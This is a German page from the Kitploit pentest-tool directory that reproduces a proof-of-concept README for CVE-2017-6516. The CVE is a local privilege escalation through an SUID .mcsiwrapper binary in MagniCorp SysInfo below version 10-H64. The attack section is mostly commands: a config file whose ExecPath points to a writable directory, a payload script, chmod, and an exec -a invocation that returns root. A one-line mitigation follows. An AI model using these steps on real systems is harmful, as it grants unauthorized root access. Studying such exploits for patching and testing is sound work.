Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-6516-mcsiwrapper- — Ein PoC / eine Methodik zum Ausnutzen von CVE-2017-6516 | Kitploit
Tools/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Privilege EscalationSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Ein PoC / eine Methodik zum Ausnutzen von CVE-2017-6516

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2017-6516

CVE-2017-6516 ist eine Privilegienausweitungsschwachstelle, die auf die Binärdatei .mcsiwrapper von MagniCorp SysInfo unter Version 10-H64 abzielt. Wenn diese Binärdatei das SUID-Bit gesetzt hat und veraltet ist, kann ein Benutzer beliebigen Code als Besitzer der Binärdatei ausführen – was oft root ist.

Voraussetzungen

  • Die Binärdatei .mcsiwrapper muss das SUID-Bit gesetzt haben:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • Die Binärdatei .mcsiwrapper muss eine Version unter 10-H64 sein:
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

Ausnutzung

Erstellen Sie eine Datei config mit folgendem Inhalt:

root@kitploit:~
ExecPath=<Path to a writeable directory>

Erstellen Sie eine ausführbare Payload-Datei im ExecPath-Verzeichnis, zum Beispiel:

root@kitploit:~
#!/bin/sh
whoami

Und machen Sie sie ausführbar:

root@kitploit:~
$ chmod +x payload

Führen Sie den Befehl aus:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Gegenmaßnahmen

Aktualisieren Sie .mcsiwrapper auf mindestens 10-H64.

Tool herunterladen